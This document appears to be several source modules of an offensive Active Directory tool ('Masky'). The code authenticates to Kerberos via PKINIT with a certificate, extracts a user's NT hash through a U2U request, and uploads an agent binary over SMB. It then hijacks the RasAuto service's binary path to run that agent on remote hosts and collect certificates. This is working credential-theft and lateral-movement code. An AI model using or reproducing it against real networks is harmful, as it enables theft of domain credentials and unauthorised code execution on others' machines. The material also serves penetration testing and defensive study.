import datetime
import logging
import socket
from random import getrandbits
from typing import Tuple

from asn1crypto import cms, core
from impacket.dcerpc.v5.rpcrt import TypeSerialization1
from impacket.krb5 import constants
from impacket.krb5.asn1 import (
    AD_IF_RELEVANT,
    AP_REQ,
    AS_REP,
    TGS_REP,
    TGS_REQ,
    Authenticator,
    EncASRepPart,
    EncTicketPart,
)
from impacket.krb5.asn1 import Ticket as TicketAsn1
from impacket.krb5.asn1 import seq_set, seq_set_iter
from impacket.krb5.ccache import CCache
from impacket.krb5.crypto import Key, _enctype_table
from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.pac import (
    NTLM_SUPPLEMENTAL_CREDENTIAL,
    PAC_CREDENTIAL_DATA,
    PAC_CREDENTIAL_INFO,
    PAC_INFO_BUFFER,
    PACTYPE,
)
from impacket.krb5.types import KerberosTime, Principal, Ticket
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue

from .certificate import (
    get_id_from_certificate,
    get_object_sid_from_certificate,
    hash_digest,
    hashes,
    load_pfx,
    rsa,
    x509,
)
from .pkinit import PA_PK_AS_REP, Enctype, KDCDHKeyInfo, build_pkinit_as_req

logger = logging.getLogger("masky")


def truncate_key(value: bytes, keysize: int) -> bytes:
    output = b""
    current_num = 0
    while len(output) < keysize:
        current_digest = hash_digest(bytes([current_num]) + value, hashes.SHA1)
        if len(output) + len(current_digest) > keysize:
            output += current_digest[: keysize - len(output)]
            break
        output += current_digest
        current_num += 1

    return output


def cert_id_to_parts(id_type: str, identification: str) -> Tuple[str, str]:
    if id_type == "DNS Host Name":
        parts = identification.split(".")
        if len(parts) == 1:
            cert_username = identification
            cert_domain = ""
        else:
            cert_username = parts[0] + "$"
            cert_domain = ".".join(parts[1:])
    elif id_type == "UPN":
        parts = identification.split("@")
        if len(parts) == 1:
            cert_username = identification
            cert_domain = ""
        else:
            cert_username = "@".join(parts[:-1])
            cert_domain = parts[-1]
    else:
        return (None, None)
    return (cert_username, cert_domain)


class Authenticate:
    def __init__(self, dc_ip, user, no_ccache, no_hash):
        self.dc_ip = dc_ip
        self.user = user
        self.cert = user.cert
        self.key = user.privatekey
        self.no_ccache = no_ccache
        self.no_hash = no_hash
        self.nt_hash = None

    def authenticate(self, is_key_credential=False):
        username = self.user.name
        domain = self.user.domain

        if not is_key_credential:
            id_type, identification = get_id_from_certificate(self.cert)
            object_sid = get_object_sid_from_certificate(self.cert)
            cert_username, cert_domain = cert_id_to_parts(id_type, identification)

            if not any([cert_username, cert_domain]):
                logger.warning(
                    "Could not find identification in the provided certificate"
                )

            if not username:
                username = cert_username
            elif cert_username:
                if username.lower() not in [
                    cert_username.lower(),
                    cert_username.lower() + "$",
                ]:
                    logger.warning(
                        (
                            "The provided username does not match the identification "
                            "found in the provided certificate: %s - %s"
                        )
                        % (repr(username), repr(cert_username))
                    )
                    res = input("Do you want to continue? (Y/n) ").rstrip("\n")
                    if res.lower() == "n":
                        return False

            if cert_domain:
                domain = cert_domain

            if (
                domain.lower() != cert_domain.lower()
                and not cert_domain.lower().startswith(domain.lower().rstrip(".") + ".")
            ):
                logger.warning(
                    (
                        "The provided domain does not match the identification "
                        "found in the provided certificate: %s - %s"
                    )
                    % (repr(domain), repr(cert_domain))
                )
                res = input("Do you want to continue? (Y/n) ").rstrip("\n")
                if res.lower() == "n":
                    return False

        if not all([username, domain]) and not is_key_credential:
            logger.error(
                (
                    "Username or domain is not specified, and identification "
                    "information was not found in the certificate"
                )
            )
            return False

        if not any([len(username), len(domain)]):
            logger.error("Username or domain is invalid: %s\\%s" % (domain, username))
            return False

        username = username.lower()

        if not self.dc_ip:
            try:
                self.dc_ip = socket.gethostbyname(domain)
            except:
                logger.error(
                    "The provided DC IP is invalid and the domain could not been resolved"
                )
                return False

        as_req, diffie = build_pkinit_as_req(username, domain, self.key, self.cert)

        try:
            tgt = sendReceive(encoder.encode(as_req), domain, self.dc_ip)
        except KerberosError as e:
            if "KDC_ERR_CLIENT_NAME_MISMATCH" in str(e) and not is_key_credential:
                logger.error(
                    ("Name mismatch between certificate and user %s" % repr(username))
                )
                if id_type is not None:
                    logger.error(
                        ("Verify that the username %s matches the certificate %s: %s")
                        % (repr(username), id_type, identification)
                    )
            elif "KDC_ERR_WRONG_REALM" in str(e) and not is_key_credential:
                logger.error(("Wrong domain name specified %s" % repr(domain)))
                if id_type is not None:
                    logger.error(
                        ("Verify that the domain %s matches the certificate %s: %s")
                        % (repr(domain), id_type, identification)
                    )
            elif "KDC_ERR_CERTIFICATE_MISMATCH" in str(e) and not is_key_credential:
                logger.error(
                    (
                        "Object SID mismatch between certificate and user %s"
                        % repr(username)
                    )
                )
                if object_sid is not None:
                    logger.error(
                        ("Verify that user %s has object SID %s")
                        % (repr(username), repr(object_sid))
                    )
            else:
                logger.error("Got error while trying to request TGT: %s" % str(e))
            return False
        except OSError:
            logger.error(
                "Cannot connect to the provided KDC host, please check the domain or DC IP parameters"
            )
            return False

        as_rep = decoder.decode(tgt, asn1Spec=AS_REP())[0]

        for pa in as_rep["padata"]:
            if pa["padata-type"] == 17:
                pk_as_rep = PA_PK_AS_REP.load(bytes(pa["padata-value"])).native
                break
        else:
            logger.error("PA_PK_AS_REP was not found in AS_REP")
            return False

        ci = cms.ContentInfo.load(pk_as_rep["dhSignedData"]).native
        sd = ci["content"]
        key_info = sd["encap_content_info"]

        if key_info["content_type"] != "1.3.6.1.5.2.3.2":
            logger.error("Unexpected value for key info content type")
            return False

        auth_data = KDCDHKeyInfo.load(key_info["content"]).native
        pub_key = int(
            "".join(["1"] + [str(x) for x in auth_data["subjectPublicKey"]]), 2
        )
        pub_key = int.from_bytes(
            core.BitString(auth_data["subjectPublicKey"]).dump()[7:],
            "big",
            signed=False,
        )
        shared_key = diffie.exchange(pub_key)

        server_nonce = pk_as_rep["serverDHNonce"]
        full_key = shared_key + diffie.dh_nonce + server_nonce

        etype = as_rep["enc-part"]["etype"]
        cipher = _enctype_table[etype]
        if etype == Enctype.AES256:
            t_key = truncate_key(full_key, 32)
        elif etype == Enctype.AES128:
            t_key = truncate_key(full_key, 16)
        else:
            logger.error("Unexpected encryption type in AS_REP")
            return False

        key = Key(cipher.enctype, t_key)
        enc_data = as_rep["enc-part"]["cipher"]
        dec_data = cipher.decrypt(key, 3, enc_data)
        enc_as_rep_part = decoder.decode(dec_data, asn1Spec=EncASRepPart())[0]

        cipher = _enctype_table[int(enc_as_rep_part["key"]["keytype"])]
        session_key = Key(cipher.enctype, bytes(enc_as_rep_part["key"]["keyvalue"]))

        if not self.no_ccache:
            ccache = CCache()
            ccache.fromTGT(tgt, key, None)
            self.user.ccache = ccache.getData()
            logger.result(f"Gathered ccache for the user '{domain}\\{username}'")

        if not self.no_hash:
            # Try to extract NT hash via U2U
            # https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py
            # AP_REQ
            ap_req = AP_REQ()
            ap_req["pvno"] = 5
            ap_req["msg-type"] = int(constants.ApplicationTagNumbers.AP_REQ.value)

            opts = []
            ap_req["ap-options"] = constants.encodeFlags(opts)

            ticket = Ticket()
            ticket.from_asn1(as_rep["ticket"])

            seq_set(ap_req, "ticket", ticket.to_asn1)

            authenticator = Authenticator()
            authenticator["authenticator-vno"] = 5

            authenticator["crealm"] = bytes(as_rep["crealm"])

            client_name = Principal()
            client_name.from_asn1(as_rep, "crealm", "cname")

            seq_set(authenticator, "cname", client_name.components_to_asn1)

            now = datetime.datetime.utcnow()
            authenticator["cusec"] = now.microsecond
            authenticator["ctime"] = KerberosTime.to_asn1(now)

            encoded_authenticator = encoder.encode(authenticator)

            encrypted_encoded_authenticator = cipher.encrypt(
                session_key, 7, encoded_authenticator, None
            )

            ap_req["authenticator"] = noValue
            ap_req["authenticator"]["etype"] = cipher.enctype
            ap_req["authenticator"]["cipher"] = encrypted_encoded_authenticator

            encoded_ap_req = encoder.encode(ap_req)

            # TGS_REQ
            tgs_req = TGS_REQ()

            tgs_req["pvno"] = 5
            tgs_req["msg-type"] = int(constants.ApplicationTagNumbers.TGS_REQ.value)

            tgs_req["padata"] = noValue
            tgs_req["padata"][0] = noValue
            tgs_req["padata"][0]["padata-type"] = int(
                constants.PreAuthenticationDataTypes.PA_TGS_REQ.value
            )
            tgs_req["padata"][0]["padata-value"] = encoded_ap_req

            req_body = seq_set(tgs_req, "req-body")

            opts = []
            opts.append(constants.KDCOptions.forwardable.value)
            opts.append(constants.KDCOptions.renewable.value)
            opts.append(constants.KDCOptions.canonicalize.value)
            opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
            opts.append(constants.KDCOptions.forwardable.value)
            opts.append(constants.KDCOptions.renewable_ok.value)

            req_body["kdc-options"] = constants.encodeFlags(opts)

            server_name = Principal(
                username, type=constants.PrincipalNameType.NT_UNKNOWN.value
            )

            seq_set(req_body, "sname", server_name.components_to_asn1)

            req_body["realm"] = str(as_rep["crealm"])

            now = datetime.datetime.utcnow() + datetime.timedelta(days=1)

            req_body["till"] = KerberosTime.to_asn1(now)
            req_body["nonce"] = getrandbits(31)
            seq_set_iter(
                req_body,
                "etype",
                (
                    int(cipher.enctype),
                    int(constants.EncryptionTypes.rc4_hmac.value),
                ),
            )

            ticket = ticket.to_asn1(TicketAsn1())
            seq_set_iter(req_body, "additional-tickets", (ticket,))
            message = encoder.encode(tgs_req)

            tgs = sendReceive(message, domain, self.dc_ip)

            tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]

            ciphertext = tgs["ticket"]["enc-part"]["cipher"]

            new_cipher = _enctype_table[int(tgs["ticket"]["enc-part"]["etype"])]

            plaintext = new_cipher.decrypt(session_key, 2, ciphertext)
            special_key = Key(18, t_key)

            data = plaintext
            enc_ticket_part = decoder.decode(data, asn1Spec=EncTicketPart())[0]
            ad_if_relevant = decoder.decode(
                enc_ticket_part["authorization-data"][0]["ad-data"],
                asn1Spec=AD_IF_RELEVANT(),
            )[0]
            pac_type = PACTYPE(ad_if_relevant[0]["ad-data"].asOctets())
            buff = pac_type["Buffers"]

            nt_hash = None
            for _ in range(pac_type["cBuffers"]):
                info_buffer = PAC_INFO_BUFFER(buff)
                data = pac_type["Buffers"][info_buffer["Offset"] - 8 :][
                    : info_buffer["cbBufferSize"]
                ]
                if info_buffer["ulType"] == 2:
                    cred_info = PAC_CREDENTIAL_INFO(data)
                    new_cipher = _enctype_table[cred_info["EncryptionType"]]
                    out = new_cipher.decrypt(
                        special_key, 16, cred_info["SerializedData"]
                    )
                    type1 = TypeSerialization1(out)
                    new_data = out[len(type1) + 4 :]
                    pcc = PAC_CREDENTIAL_DATA(new_data)
                    for cred in pcc["Credentials"]:
                        cred_structs = NTLM_SUPPLEMENTAL_CREDENTIAL(
                            b"".join(cred["Credentials"])
                        )
                        nt_hash = cred_structs["NtPassword"].hex()
                        break
                    break

                buff = buff[len(info_buffer) :]
            else:
                logger.error("Could not find credentials in PAC")
                return False

            self.nt_hash = nt_hash

            if not is_key_credential:
                logger.result(
                    f"Gathered NT hash for the user '{domain}\{username}': {nt_hash}"
                )
                self.user.nt_hash = nt_hash
            return True

        return False



import argparse
import logging
import sys
from typing import Callable, Tuple

from asn1crypto import cms as asn1cms
from asn1crypto import core as asn1core
from asn1crypto import x509 as asn1x509
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.serialization import (
    Encoding,
    NoEncryption,
    PrivateFormat,
    pkcs12,
)
from cryptography.x509.oid import ExtensionOID, NameOID
from impacket.dcerpc.v5.nrpc import checkNullString
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.char import UTF8String


logger = logging.getLogger("masky")
NAME = "cert"

PRINCIPAL_NAME = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")

NTDS_CA_SECURITY_EXT = x509.ObjectIdentifier("1.3.6.1.4.1.311.25.2")


class EnrollmentNameValuePair(asn1core.Sequence):
    _fields = [
        ("name", asn1core.BMPString),
        ("value", asn1core.BMPString),
    ]


class EnrollmentNameValuePairs(asn1core.SetOf):
    _child_spec = EnrollmentNameValuePair


def csr_to_der(csr: x509.CertificateSigningRequest) -> bytes:
    return csr.public_bytes(Encoding.DER)


def csr_to_pem(csr: x509.CertificateSigningRequest) -> bytes:
    return csr.public_bytes(Encoding.PEM)


def cert_to_pem(cert: x509.Certificate) -> bytes:
    return cert.public_bytes(Encoding.PEM)


def cert_to_der(cert: x509.Certificate) -> bytes:
    return cert.public_bytes(Encoding.DER)


def key_to_pem(key: rsa.RSAPrivateKey) -> bytes:
    return key.private_bytes(
        Encoding.PEM, PrivateFormat.PKCS8, encryption_algorithm=NoEncryption()
    )


def der_to_key(key: bytes) -> rsa.RSAPrivateKey:
    return serialization.load_der_private_key(key, None)


def pem_to_key(key: bytes) -> rsa.RSAPrivateKey:
    return serialization.load_pem_private_key(key, None)


def der_to_cert(certificate: bytes) -> x509.Certificate:
    return x509.load_der_x509_certificate(certificate)


def pem_to_cert(certificate: bytes) -> x509.Certificate:
    return x509.load_pem_x509_certificate(certificate)


def get_id_from_certificate(
    certificate: x509.Certificate,
) -> Tuple[str, str]:
    try:
        san = certificate.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )

        for name in san.value.get_values_for_type(x509.OtherName):
            if name.type_id == PRINCIPAL_NAME:
                return (
                    "UPN",
                    decoder.decode(name.value, asn1Spec=UTF8String)[0].decode(),
                )

        for name in san.value.get_values_for_type(x509.DNSName):
            return "DNS Host Name", name
    except:
        pass

    return None, None


def get_object_sid_from_certificate(
    certificate: x509.Certificate,
) -> Tuple[str, str]:
    try:
        object_sid = certificate.extensions.get_extension_for_oid(NTDS_CA_SECURITY_EXT)

        sid = object_sid.value.value
        return sid[sid.find(b"S-1-5") :].decode()
    except:
        pass

    return None


def create_pfx(key: rsa.RSAPrivateKey, cert: x509.Certificate) -> bytes:
    return pkcs12.serialize_key_and_certificates(
        name=b"",
        key=key,
        cert=cert,
        cas=None,
        encryption_algorithm=NoEncryption(),
    )


def load_pfx(
    pfx: bytes, password: bytes = None
) -> Tuple[rsa.RSAPrivateKey, x509.Certificate, None]:
    return pkcs12.load_key_and_certificates(pfx, password)[:-1]


def generate_rsa_key() -> rsa.RSAPrivateKey:
    return rsa.generate_private_key(public_exponent=0x10001, key_size=2048)


def create_csr(
    username: str, alt_name: bytes = None, key: rsa.RSAPrivateKey = None
) -> Tuple[x509.CertificateSigningRequest, rsa.RSAPrivateKey]:
    if key is None:
        logger.debug("(certipy lib) Generating RSA key")
        key = generate_rsa_key()

    csr = x509.CertificateSigningRequestBuilder()

    csr = csr.subject_name(
        x509.Name(
            [
                x509.NameAttribute(NameOID.COMMON_NAME, username),
            ]
        )
    )

    if alt_name:
        if type(alt_name) == str:
            alt_name = alt_name.encode()
        alt_name = encoder.encode(UTF8String(alt_name))

        csr = csr.add_extension(
            x509.SubjectAlternativeName(
                [
                    x509.OtherName(PRINCIPAL_NAME, alt_name),
                ]
            ),
            critical=False,
        )

    return (csr.sign(key, hashes.SHA256()), key)


def rsa_pkcs1v15_sign(
    data: bytes,
    key: rsa.RSAPrivateKey,
    hash: hashes.HashAlgorithm = hashes.SHA256,
):
    return key.sign(data, padding.PKCS1v15(), hash())


def hash_digest(data: bytes, hash: hashes.Hash):
    digest = hashes.Hash(hash())
    digest.update(data)
    return digest.finalize()


def create_cms(
    request: bytes,
    on_behalf_of: str,
    cert: x509.Certificate,
    key: rsa.RSAPrivateKey,
):
    signature_hash_algorithm = cert.signature_hash_algorithm.__class__
    cert = asn1x509.Certificate.load(cert_to_der(cert))
    content_info = asn1cms.ContentInfo()
    content_info["content_type"] = "data"
    content_info["content"] = request

    issuer_and_serial = asn1cms.IssuerAndSerialNumber()
    issuer_and_serial["issuer"] = cert.issuer
    issuer_and_serial["serial_number"] = cert.serial_number

    digest_algorithm = asn1cms.DigestAlgorithm()
    digest_algorithm["algorithm"] = signature_hash_algorithm.name

    name_value_pairs = EnrollmentNameValuePairs()
    requester_name = EnrollmentNameValuePair()
    requester_name["name"] = checkNullString("requestername")
    requester_name["value"] = checkNullString(on_behalf_of)
    name_value_pairs.append(requester_name)
    name_value_pairs_attrib = asn1cms.CMSAttribute()
    asn1cms.CMSAttribute._oid_specs["1.3.6.1.4.1.311.13.2.1"] = EnrollmentNameValuePairs
    name_value_pairs_attrib["type"] = "1.3.6.1.4.1.311.13.2.1"
    name_value_pairs_attrib["values"] = name_value_pairs

    signed_attribs = asn1cms.CMSAttributes()
    signed_attribs.append(name_value_pairs_attrib)
    att = asn1cms.CMSAttribute()
    att["type"] = "message_digest"
    att["values"] = [hash_digest(request, signature_hash_algorithm)]
    signed_attribs.append(att)

    attribs_signature = rsa_pkcs1v15_sign(
        signed_attribs.dump(), key, hash=signature_hash_algorithm
    )

    signer_info = asn1cms.SignerInfo()
    signer_info["version"] = 1
    signer_info["sid"] = issuer_and_serial
    signer_info["digest_algorithm"] = digest_algorithm
    signer_info["signature_algorithm"] = cert["signature_algorithm"]
    signer_info["signature"] = attribs_signature
    signer_info["signed_attrs"] = signed_attribs

    signed_info_attribs = asn1cms.SignerInfo()
    signed_info_attribs["version"] = 1
    signed_info_attribs["sid"] = issuer_and_serial
    signed_info_attribs["digest_algorithm"] = digest_algorithm
    signed_info_attribs["signature_algorithm"] = cert["signature_algorithm"]
    signed_info_attribs["signature"] = attribs_signature
    signed_info_attribs["signed_attrs"] = signed_attribs

    signer_infos = asn1cms.SignerInfos()
    signer_infos.append(signer_info)

    digest_algorithms = asn1cms.DigestAlgorithms()
    digest_algorithms.append(digest_algorithm)

    certificate_choice = asn1cms.CertificateChoices("certificate", cert)
    certificate_set = asn1cms.CertificateSet()
    certificate_set.append(certificate_choice)

    signed_data = asn1cms.SignedData()
    signed_data["version"] = 1
    signed_data["digest_algorithms"] = digest_algorithms
    signed_data["encap_content_info"] = content_info
    signed_data["certificates"] = certificate_set
    signed_data["signer_infos"] = signer_infos

    outer_content_info = asn1cms.ContentInfo()
    outer_content_info["content_type"] = "signed_data"
    outer_content_info["content"] = signed_data

    return outer_content_info.dump()


def entry(options: argparse.Namespace) -> None:
    cert, key = None, None

    if not any([options.pfx, options.cert, options.key]):
        logger.error("-pfx, -cert, or -key is required")
        return

    if options.pfx:
        password = None
        if options.password:
            logger.debug(
                "Loading PFX %s with password %s" % (repr(options.pfx), password)
            )
            password = options.password.encode()
        else:
            logger.debug("Loading PFX %s without password" % repr(options.pfx))

        with open(options.pfx, "rb") as f:
            pfx = f.read()

        key, cert = load_pfx(pfx, password)

    if options.cert:
        logger.debug("Loading certificate from %s" % repr(options.cert))

        with open(options.cert, "rb") as f:
            cert = f.read()
        try:
            cert = pem_to_cert(cert)
        except Exception:
            cert = der_to_cert(cert)

    if options.key:
        logger.debug("Loading private key from %s" % repr(options.cert))

        with open(options.key, "rb") as f:
            key = f.read()
        try:
            key = pem_to_key(key)
        except Exception:
            key = der_to_key(key)

    if options.export:
        pfx = create_pfx(key, cert)
        if options.out:
            logger.info("Writing PFX to %s" % repr(options.out))

            with open(options.out, "wb") as f:
                f.write(pfx)
        else:
            sys.stdout.buffer.write(pfx)
    else:
        output = ""
        log_str = ""
        if cert and not options.nocert:
            output += cert_to_pem(cert).decode()
            log_str += "certificate"
            if key:
                log_str += " and "

        if key and not options.nokey:
            output += key_to_pem(key).decode()
            log_str += "private key"

        if len(output) == 0:
            logger.error("Output is empty")
            return

        if options.out:
            logger.info("Writing %s to %s" % (log_str, repr(options.out)))

            with open(options.out, "w") as f:
                f.write(output)
        else:
            print(output)



import logging
import string
import random
from .results import MaskyResults
from pkg_resources import resource_filename
from impacket.dcerpc.v5 import transport, scmr
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5.ndr import NULL

logger = logging.getLogger("masky")


class Smb:
    def __init__(
        self,
        domain,
        username,
        dc_target,
        password=None,
        hashes=None,
        kerberos=None,
        aeskey=None,
    ):
        self.__domain = domain
        self.__username = username
        self.__password = password
        self.__lmhash, self.__nthash = "", ""
        if hashes:
            self.__lmhash, self.__nthash = hashes.split(":")
        self.__dc_target = dc_target
        self.__kerberos = kerberos
        self.__aeskey = aeskey

        self.__rpc_con = None
        self.__scmr_con = None
        self.__svc_handle = None
        self.__svc_name = "RasAuto"
        self.__service = None

        self.__initial_binary_path = None
        self.__initial_start_type = None
        self.__initial_error_control = None

        self.__port = 445
        self.__share = "C$"
        self.__error_filename = (
            f"{''.join(random.choices(string.ascii_lowercase, k=8))}.png"
        )
        self.__output_filename = (
            f"{''.join(random.choices(string.ascii_lowercase, k=8))}.jpg"
        )
        self.__agent_filename = (
            f"{''.join(random.choices(string.ascii_lowercase, k=8))}.exe"
        )
        self.__masky_remote_path = f"\\Windows\\Temp\\{self.__agent_filename}"
        self.__results_remote_path = f"\\Windows\\Temp\\{self.__output_filename}"
        self.__errors_remote_path = f"\\Windows\\Temp\\{self.__error_filename}"
        self.__masky_local_path = resource_filename("masky.bin", "Masky.exe")
        logger.debug(
            f"The Masky agent binary will be uploaded in: {self.__masky_remote_path}"
        )
        logger.debug(
            f"The Masky agent output will be stored in: {self.__results_remote_path}"
        )
        logger.debug(
            f"The Masky agent errors will be stored in: {self.__errors_remote_path}"
        )

    def exec_masky(self, target, ca):
        try:
            self.__upload_masky(target)
            logger.debug(
                f"Masky agent was successfuly uploaded in: '{self.__masky_remote_path}'"
            )
        except Exception as e:
            if "STATUS_ACCESS_DENIED" in str(e):
                logger.warn(
                    f"The user {self.__domain}\{self.__username} is not local administrator on this system"
                )
            elif "STATUS_LOGON_FAILURE" in str(e):
                logger.error(
                    f"The provided credentials for the user '{self.__domain}\{self.__username}' are invalids or the user does not exist"
                )
            else:
                logger.error(f"Fail to upload the agent ({str(e)})")
            raise Exception
        try:
            self.__init_rpc(target)
            self.__init_scmr()
            self.__edit_svc(ca)
            logger.debug(f"The service '{self.__svc_name}' was successfuly modified")
        except Exception as e:
            logger.error(f"Fail to edit the '{self.__svc_name}' service via DCERPC")
            self.__clean(target)
            raise Exception
        try:
            scmr.hRStartServiceW(self.__scmr_con, self.__service)
        except Exception as e:
            pass
        logger.debug(f"The '{self.__svc_name}' was restarted for command execution")

        rslt = None
        try:
            rslt = self.__process_results(target)
        except Exception as e:
            logger.error(f"The Masky agent execution probably failed ({str(e)})")
        self.__clean(target)
        return rslt

    def __upload_masky(self, target_host):
        smbclient = SMBConnection(target_host, target_host, sess_port=self.__port)
        if self.__kerberos:
            smbclient.kerberosLogin(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
                self.__aeskey,
                self.__dc_target,
            )
        else:
            smbclient.login(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
            )
        with open(self.__masky_local_path, "rb") as p:
            smbclient.putFile(self.__share, self.__masky_remote_path, p.read)
        smbclient.close()
        logger.result(
            "Current user seems to be local administrator, attempting to run Masky agent..."
        )

    def __remove_masky(self, target_host):
        smbclient = SMBConnection(target_host, target_host, sess_port=self.__port)
        if self.__kerberos:
            smbclient.kerberosLogin(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
                self.__aeskey,
                self.__dc_target,
            )
        else:
            smbclient.login(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
            )
        try:
            smbclient.deleteFile(self.__share, self.__masky_remote_path)
        except:
            logger.warn(
                f"Fail to remove Masky agent located in: {self.__masky_remote_path}"
            )
        smbclient.close()

    def __process_results(self, target_host):
        rslt = MaskyResults()
        smbclient = SMBConnection(target_host, target_host, sess_port=self.__port)
        if self.__kerberos:
            smbclient.kerberosLogin(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
                self.__aeskey,
                self.__dc_target,
            )
        else:
            smbclient.login(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
            )

        try:
            smbclient.getFile(
                self.__share,
                self.__results_remote_path,
                rslt.save_content_to_json,
            )
        except:
            logger.warn("No Masky agent output file was downloaded")

        try:
            smbclient.deleteFile(self.__share, self.__results_remote_path)
        except:
            logger.warn(
                f"Fail to remove Masky agent output file located in: {self.__results_remote_path}"
            )

        try:
            smbclient.getFile(
                self.__share,
                self.__errors_remote_path,
                rslt.parse_agent_errors,
            )
            if rslt.errors:
                logger.error(
                    f"The Masky agent execution failed, enable the debugging to display the stacktrace"
                )
        except:
            logger.warn("No Masky agent error file was downloaded")
        try:
            smbclient.deleteFile(self.__share, self.__errors_remote_path)
        except:
            logger.warn(
                f"Fail to remove Masky agent error file located in: {self.__errors_remote_path}"
            )

        if rslt.json_data and len(rslt.json_data) == 0:
            logger.debug(
                "Masky agent was successfully executed but no active session was found"
            )
            return rslt

        if rslt.json_data:
            rslt.process_data()
        smbclient.close()
        return rslt

    def __init_rpc(self, target_host):
        np_bind = f"ncacn_np:{target_host}[\pipe\svcctl]"
        self.__rpc_con = transport.DCERPCTransportFactory(np_bind)
        self.__rpc_con.set_dport(self.__port)
        self.__rpc_con.setRemoteHost(target_host)
        if hasattr(self.__rpc_con, "set_credentials"):
            self.__rpc_con.set_credentials(
                self.__username,
                self.__password,
                self.__domain,
                self.__lmhash,
                self.__nthash,
                self.__aeskey,
            )
        self.__rpc_con.set_kerberos(self.__kerberos, self.__dc_target)

    def __init_scmr(self):
        self.__scmr_con = self.__rpc_con.get_dce_rpc()
        self.__scmr_con.connect()
        smb_socket = self.__rpc_con.get_smb_connection()
        smb_socket.setTimeout(300000)
        self.__scmr_con.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr_con)
        self.__svc_handle = resp["lpScHandle"]
        resp = scmr.hROpenServiceW(self.__scmr_con, self.__svc_handle, self.__svc_name)
        self.__service = resp["lpServiceHandle"]

    def __edit_svc(self, ca):
        resp = scmr.hRQueryServiceConfigW(self.__scmr_con, self.__service)
        self.__initial_binary_path = resp["lpServiceConfig"]["lpBinaryPathName"]
        self.__initial_start_type = resp["lpServiceConfig"]["dwStartType"]
        self.__initial_error_control = resp["lpServiceConfig"]["dwErrorControl"]
        logger.debug(
            f"The current '{self.__svc_name}' service binary path is: '{self.__initial_binary_path}'"
        )
        scmr.hRChangeServiceConfigW(
            self.__scmr_con,
            self.__service,
            scmr.SERVICE_NO_CHANGE,
            scmr.SERVICE_DEMAND_START,
            scmr.SERVICE_ERROR_IGNORE,
            f'{self.__masky_remote_path} "{ca}" "{self.__output_filename}" "{self.__error_filename}"',
            NULL,
            NULL,
            NULL,
            NULL,
            NULL,
            NULL,
            NULL,
            NULL,
        )

    def __revert_svc(self):
        try:
            scmr.hRChangeServiceConfigW(
                self.__scmr_con,
                self.__service,
                scmr.SERVICE_NO_CHANGE,
                self.__initial_start_type,
                self.__initial_error_control,
                self.__initial_binary_path,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
            )
            logger.debug(
                f"The '{self.__svc_name}' service binary path has been restored"
            )
        except Exception as e:
            logger.warn(
                f"Fail to revert '{self.__svc_name}' service binary path ({str(e)}])"
            )

    def __clean(self, target_host):
        try:
            self.__revert_svc()
        except:
            logger.warning(
                f"An error occurred while trying to restore service {self.__svc_name}. Trying again..."
            )
            try:
                self.__init_scmr()
                self.__revert_svc()
            except Exception as e:
                logger.warning(
                    f"An unknown error occured while trying to revert '{self.__svc__name}' ({str(e)})"
                )
        try:
            scmr.hRControlService(
                self.__scmr_con, self.__service, scmr.SERVICE_CONTROL_STOP
            )
            scmr.hRCloseServiceHandle(self.__scmr_con, self.__service)
        except:
            pass
        try:
            self.__remove_masky(target_host)
        except Exception as e:
            logger.warn(f"Fail to remove Masky related files on the target ({str(e)}")



import socket
import os
from pathlib import Path


def is_valid_file(file_path):
    if file_path == "":
        return False
    elif not Path(file_path).is_file():
        return False
    elif not os.access(file_path, os.R_OK):
        return False
    return True


def is_valid_output_folder(folder_path):
    try:
        if folder_path == "":
            return False
        elif not Path(folder_path).is_dir():
            return False
        elif not os.access(folder_path, os.W_OK):
            return False
    except Exception:
        return False
    return True


def scan_port(host, port=445):
    s = socket.socket()
    s.settimeout(2)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    try:
        code = s.connect_ex((host, port))
        s.close()
        return code == 0
    except socket.error:
        return False



import datetime
import os
from random import getrandbits
from typing import Tuple, Union

from asn1crypto import algos as asn1algos
from asn1crypto import cms as asn1cms
from asn1crypto import core as asn1core
from asn1crypto import keys as asn1keys
from asn1crypto import x509 as asn1x509
from impacket.krb5 import constants
from impacket.krb5.asn1 import (
    AS_REQ,
    KERB_PA_PAC_REQUEST,
    seq_set,
    seq_set_iter,
)
from impacket.krb5.types import KerberosTime, Principal
from pyasn1.codec.der import encoder
from pyasn1.type.univ import noValue

from .certificate import (
    cert_to_der,
    hash_digest,
    hashes,
    rsa,
    rsa_pkcs1v15_sign,
    x509,
)

# https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py#L292
DH_PARAMS = {
    "p": int(
        (
            "00ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea6"
            "3b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e4"
            "85b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b"
            "1fe649286651ece65381ffffffffffffffff"
        ),
        16,
    ),
    "g": 2,
}


class Enctype(object):
    DES_CRC = 1
    DES_MD4 = 2
    DES_MD5 = 3
    DES3 = 16
    AES128 = 17
    AES256 = 18
    RC4 = 23


class DHNonce(asn1core.OctetString):
    pass


